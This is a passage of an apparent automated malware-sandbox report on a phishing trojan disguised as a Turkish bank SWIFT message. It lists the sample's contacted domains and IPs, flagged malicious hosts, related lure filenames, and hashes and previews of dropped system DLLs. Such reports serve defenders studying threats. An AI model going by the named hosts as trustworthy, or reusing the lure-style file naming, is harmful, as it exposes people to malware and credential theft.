Mesaj#U0131#09971.exe, 00000004.00000003.8000125730.000000001E840000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8007210967.000000001D474000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8005491336.000000001D464000.00000004.00001000.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000002.8095117598.000000001E2C0000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr	false	Avira URL Cloud: safe	unknown
http://dbxo1.shop/nr	Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	Swift Mesaj#U0131#09971.exe	false		high
http://dbxo1.shop/db1/index.phpC	Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033506219.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8030675103.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8033003378.000000000186C000.00000004.00000020.00020000.00000000.sdmp, Swift Mesaj#U0131#09971.exe, 00000004.00000003.8031540665.000000000186C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
103.14.99.114	aapancart.com	Singapore		58641	TRUNKOZ-INTrunkozTechnologiesPvtLtdIN	false
172.67.203.65	dbxo1.shop	United States		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	755179
Start date and time:	2022-11-28 12:43:49 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Swift Mesaj#U0131#09971.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@8/55@2/2
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 24% (good quality ratio 23.5%) Quality average: 87.8% Quality standard deviation: 21.8%
HCA Information:	Successful, ratio: 95% Number of executed functions: 57 Number of non-executed functions: 85
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe
Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, login.live.com, ctldl.windowsupdate.com, wdcp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
103.14.99.114	E-DEKONT.exe	Get hash	malicious	Browse
103.14.99.114	SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
aapancart.com	E-DEKONT.exe	Get hash	malicious	Browse	103.14.99.114
aapancart.com	SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe	Get hash	malicious	Browse	103.14.99.114
dbxo1.shop	E-DEKONT.exe	Get hash	malicious	Browse	104.21.44.194
dbxo1.shop	SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe	Get hash	malicious	Browse	104.21.44.194

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TRUNKOZ-INTrunkozTechnologiesPvtLtdIN	E-DEKONT.exe	Get hash	malicious	Browse	103.14.99.114
	SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe	Get hash	malicious	Browse	103.14.99.114
	swiftPa.exe	Get hash	malicious	Browse	103.14.97.170
	Payment 9.10000 USD.exe	Get hash	malicious	Browse	103.14.97.80
	mQhMxZDcfL.exe	Get hash	malicious	Browse	103.14.97.85
	wxJXjeoQg5.exe	Get hash	malicious	Browse	103.14.97.85
	c2tGrIp4er.exe	Get hash	malicious	Browse	103.14.97.85
	Bch2kEvvA6.exe	Get hash	malicious	Browse	103.14.97.85
	PO-468468-MES.exe	Get hash	malicious	Browse	103.14.97.85
	https://redchillicrackers.com/wp-content/p/	Get hash	malicious	Browse	103.14.99.122
	PO-20456200 Ningbo Xingrui Electronic.exe	Get hash	malicious	Browse	103.14.97.85
	209746 -Bumet B.V.exe	Get hash	malicious	Browse	103.14.97.85
	PO-20856200 OLEO FLEX_ PDF.exe	Get hash	malicious	Browse	103.14.97.85
	RFQ Agencia de Aduana Pedro.exe	Get hash	malicious	Browse	103.14.97.85
	RFQ 2046573 SNVI Group.exe	Get hash	malicious	Browse	103.14.97.85
	RFQ Agencia de Aduana Pedro.exe	Get hash	malicious	Browse	103.14.97.85
	PO 300720-FMB.exe	Get hash	malicious	Browse	103.14.97.85

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	094089010-094098574-1669343495-1669343493-2332.html	Get hash	malicious	Browse	103.14.99.114
	Facture.html	Get hash	malicious	Browse	103.14.99.114
	SyyMuhzBJ3.exe	Get hash	malicious	Browse	103.14.99.114
	file.exe	Get hash	malicious	Browse	103.14.99.114
	045624132441524.exe	Get hash	malicious	Browse	103.14.99.114
	file.exe	Get hash	malicious	Browse	103.14.99.114
	Lakeringernes (1).exe	Get hash	malicious	Browse	103.14.99.114
	FedEx Express AWB#53053232097Receipt.exe	Get hash	malicious	Browse	103.14.99.114
	Rfq#Specification.exe	Get hash	malicious	Browse	103.14.99.114
	094089010-094098574-1669343495-1669343493-2332.html	Get hash	malicious	Browse	103.14.99.114
	https://service.roccasoluciones.com/	Get hash	malicious	Browse	103.14.99.114
	output(1)(1).js	Get hash	malicious	Browse	103.14.99.114
	#U4e70#U5bb6#U540d#U7247#U4fe1#U606f.Html	Get hash	malicious	Browse	103.14.99.114
	#U6f5c#U5728#U8ba2#U5355#U548c#U4ea7#U54c1#U8bf7#U6c42.htm	Get hash	malicious	Browse	103.14.99.114
	E-DEKONT.exe	Get hash	malicious	Browse	103.14.99.114
	000211232334_33455INVOICE .vbs	Get hash	malicious	Browse	103.14.99.114
	Setup.exe	Get hash	malicious	Browse	103.14.99.114
	VAN66789.exe	Get hash	malicious	Browse	103.14.99.114
	setup.exe	Get hash	malicious	Browse	103.14.99.114
	Setup.exe	Get hash	malicious	Browse	103.14.99.114

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-console-l1-1-0.dll	E-DEKONT.exe	Get hash	malicious	Browse
	VAN66789.exe	Get hash	malicious	Browse
	e555fe3baa7d282f00cdaccf6ce2820d9fdc6556f8f24.exe	Get hash	malicious	Browse
	MhQTqiCvm1.exe	Get hash	malicious	Browse
	PROFORMA-418340-2022.exe	Get hash	malicious	Browse
	SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Win32.BotX-gen.30874.3243.exe	Get hash	malicious	Browse
	Fedex No71502.exe	Get hash	malicious	Browse
	gunzipped.exe	Get hash	malicious	Browse
	PO110859600.js	Get hash	malicious	Browse
	cH9kNQjk7C.jar	Get hash	malicious	Browse
	PO-11085960.js	Get hash	malicious	Browse
	879-5160.js	Get hash	malicious	Browse
	Orderlist.jar	Get hash	malicious	Browse
	e-dekont.pdf.exe	Get hash	malicious	Browse
	Dekont.exe	Get hash	malicious	Browse
	e-dekont.pdf.exe	Get hash	malicious	Browse
	Purchase Order-#17001396.exe	Get hash	malicious	Browse
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	Browse
	ORDER.jar	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\492576258725572177298999.tmp

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 3, database pages 22, 1st free page 7, free pages 2, cookie 0x10, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	45056
Entropy (8bit):	0.7853305971874845
Encrypted:	false
SSDEEP:	48:43b/DVIIgyZKLk8s8LKvUf9K4UKTgyJqhtcebVEq8Ma0D0HOlcjlGxdKmtAONu41:Sb+uKLyeym/grcebn8MouOjlGxdKmt3N
MD5:	00C036C61F625BF9D25362B9BE24ADEB
SHA1:	6738C3D037E4A2E9F41B1398BA88E5771532F593
SHA-256:	0C187B091E99E5BB665C59F8F8E027D5658904B32E4196D2EB402F3B1CAD69EF
SHA-512:	711265BC8C1653BF6E862343BF3149A2AB09F4BA7D38E2D8A437001DB6C0F1936F6362571DD577CD7BDBEEC766DF141CB7E0681512C12E25A99CDB71731232D1
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-console-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.080160932980843
Encrypted:	false
SSDEEP:	192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS
MD5:	502263C56F931DF8440D7FD2FA7B7C00
SHA1:	523A3D7C3F4491E67FC710575D8E23314DB2C1A2
SHA-256:	94A5DF1227818EDBFD0D5091C6A48F86B4117C38550343F780C604EEE1CD6231
SHA-512:	633EFAB26CDED9C3A5E144B81CBBD3B6ADF265134C37D88CFD5F49BB18C345B2FC3A08BA4BBC917B6F64013E275239026829BA08962E94115E94204A47B80221
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: E-DEKONT.exe, Detection: malicious, Browse Filename: VAN66789.exe, Detection: malicious, Browse Filename: e555fe3baa7d282f00cdaccf6ce2820d9fdc6556f8f24.exe, Detection: malicious, Browse Filename: MhQTqiCvm1.exe, Detection: malicious, Browse Filename: PROFORMA-418340-2022.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.NSIS.InjectorX-gen.6534.4411.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.BotX-gen.30874.3243.exe, Detection: malicious, Browse Filename: Fedex No71502.exe, Detection: malicious, Browse Filename: gunzipped.exe, Detection: malicious, Browse Filename: PO110859600.js, Detection: malicious, Browse Filename: cH9kNQjk7C.jar, Detection: malicious, Browse Filename: PO-11085960.js, Detection: malicious, Browse Filename: 879-5160.js, Detection: malicious, Browse Filename: Orderlist.jar, Detection: malicious, Browse Filename: e-dekont.pdf.exe, Detection: malicious, Browse Filename: Dekont.exe, Detection: malicious, Browse Filename: e-dekont.pdf.exe, Detection: malicious, Browse Filename: Purchase Order-#17001396.exe, Detection: malicious, Browse Filename: Ziraat Bankasi Swift Mesaji.exe, Detection: malicious, Browse Filename: ORDER.jar, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....."............!......................... ...............................0.......J....@.............................+............ ..................8=..............T............................................................................text...+........................... ..`.rsrc........ ......................@..@......".........;...T...T.........".........d.................".....................RSDSMB...5.G.8.'.d.....api-ms-win-core-console-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg.......+....edata... ..`....rsrc$01....` .......rsrc$02......................".....................(...`...............,...W...................G...o...............................D...s...............5...b...............................................api-ms-win-core-console-l1-1-0.dll.AllocConsole.kern

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-datetime-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.093995452106596
Encrypted:	false
SSDEEP:	192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw
MD5:	CB978304B79EF53962408C611DFB20F5
SHA1:	ECA42F7754FB0017E86D50D507674981F80BC0B9
SHA-256:	90FAE0E7C3644A6754833C42B0AC39B6F23859F9A7CF4B6C8624820F59B9DAD3
SHA-512:	369798CD3F37FBAE311B6299DA67D19707D8F770CF46A8D12D5A6C1F25F85FC959AC5B5926BC68112FA9EB62B402E8B495B9E44F44F8949D7D648EA7C572CF8C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...A..............!......................... ...............................0.......#....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....A...........<...T...T.......A...........d...............A.......................RSDS...W,X.l..o....4....api-ms-win-core-datetime-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02....................A.......P...............(...8...H...................t.......................api-ms-win-core-datetime-l1-1-0.dll.GetDateFormatA.kernel32.GetDateFormatA.GetDateFormatW.kernel32.GetDateFormatW.GetTimeFormatA.kernel32.GetTimeFormatA

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-debug-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1028816880814265
Encrypted:	false
SSDEEP:	384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L
MD5:	88FF191FD8648099592ED28EE6C442A5
SHA1:	6A4F818B53606A5602C609EC343974C2103BC9CC
SHA-256:	C310CC91464C9431AB0902A561AF947FA5C973925FF70482D3DE017ED3F73B7D
SHA-512:	942AE86550D4A4886DAC909898621DAB18512C20F3D694A8AD444220AEAD76FA88C481DF39F93C7074DBBC31C3B4DAF97099CFED86C2A0AAA4B63190A4B307FD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!......................... ...............................0......GF....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@................9...T...T...................d.......................................RSDS.j..v..C...B..h....api-ms-win-core-debug-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............................P...............(...8...H...\|...............q.......................api-ms-win-core-debug-l1-1-0.dll.DebugBreak.kernel32.DebugBreak.IsDebuggerPresent.kernel32.IsDebuggerPresent.OutputDebugStringA.kernel32.OutputDebugStri

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-errorhandling-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.126358371711227
Encrypted:	false
SSDEEP:	192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v
MD5:	6D778E83F74A4C7FE4C077DC279F6867
SHA1:	F5D9CF848F79A57F690DA9841C209B4837C2E6C3
SHA-256:	A97DCCA76CDB12E985DFF71040815F28508C655AB2B073512E386DD63F4DA325
SHA-512:	02EF01583A265532D3970B7D520728AA9B68F2B7C309EE66BD2B38BAF473EF662C9D7A223ACF2DA722587429DA6E4FBC0496253BA5C41E214BEA240CE824E8A2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...\x.............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....\x..........A...T...T.......\x..........d...............\x......................RSDS.1....U45.z.d.....api-ms-win-core-errorhandling-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02............\x......n...............(...D...`...................4...f.......................'...J.....................api-ms-win-core-errorhandling-l1-1-0.dll.GetErrorMode.kernel32.GetErrorMode.GetLastError.kernel32.GetLastError.RaiseExcept

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	21816
Entropy (8bit):	7.014255619395433
Encrypted:	false
SSDEEP:	384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8
MD5:	94AE25C7A5497CA0BE6882A00644CA64
SHA1:	F7AC28BBC47E46485025A51EEB6C304B70CEE215
SHA-256:	7EA06B7050F9EA2BCC12AF34374BDF1173646D4E5EBF66AD690B37F4DF5F3D4E
SHA-512:	83E570B79111706742D0684FC16207AE87A78FA7FFEF58B40AA50A6B9A2C2F77FE023AF732EF577FB7CD2666E33FFAF0E427F41CA04075D83E0F6A52A177C2B0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.................!.........................0...............................@......./....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@...............8...T...T..................d......................................RSDS.0...B..8....G....api-ms-win-core-file-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................K...K.......D...p...6...`.......................?...l...............A...................6..._...................;...e............... ...I...n...............-...d......................g..................U...................M...

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.112057846012794
Encrypted:	false
SSDEEP:	192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
MD5:	E2F648AE40D234A3892E1455B4DBBE05
SHA1:	D9D750E828B629CFB7B402A3442947545D8D781B
SHA-256:	C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
SHA-512:	18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-file-l2-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.166618249693435
Encrypted:	false
SSDEEP:	192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
MD5:	E479444BDD4AE4577FD32314A68F5D28
SHA1:	77EDF9509A252E886D4DA388BF9C9294D95498EB
SHA-256:	C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
SHA-512:	2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..\|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..\|........8...T...T.......4..\|........d...............4..\|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..\|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-handle-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1117101479630005
Encrypted:	false
SSDEEP:	384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
MD5:	6DB54065B33861967B491DD1C8FD8595
SHA1:	ED0938BBC0E2A863859AAD64606B8FC4C69B810A
SHA-256:	945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
SHA-512:	AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...\|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-heap-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.174986589968396
Encrypted:	false
SSDEEP:	192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
MD5:	2EA3901D7B50BF6071EC8732371B821C
SHA1:	E7BE926F0F7D842271F7EDC7A4989544F4477DA7
SHA-256:	44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
SHA-512:	6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-interlocked-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17856
Entropy (8bit):	7.076803035880586
Encrypted:	false
SSDEEP:	192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
MD5:	D97A1CB141C6806F0101A5ED2673A63D
SHA1:	D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
SHA-256:	DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
SHA-512:	0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-libraryloader-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.131154779640255
Encrypted:	false
SSDEEP:	384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
MD5:	D0873E21721D04E20B6FFB038ACCF2F1
SHA1:	9E39E505D80D67B347B19A349A1532746C1F7F88
SHA-256:	BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
SHA-512:	4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....ul...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....ul........A...T...T........ul........d................ul....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............ul....................(...p...........R...}..................Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c

C:\Users\user\AppData\Local\Temp\E0F35830\api-ms-win-core-localization-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20792
Entropy (8bit):	7.089032314841867
Encrypted:	false
SSDEEP:	384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
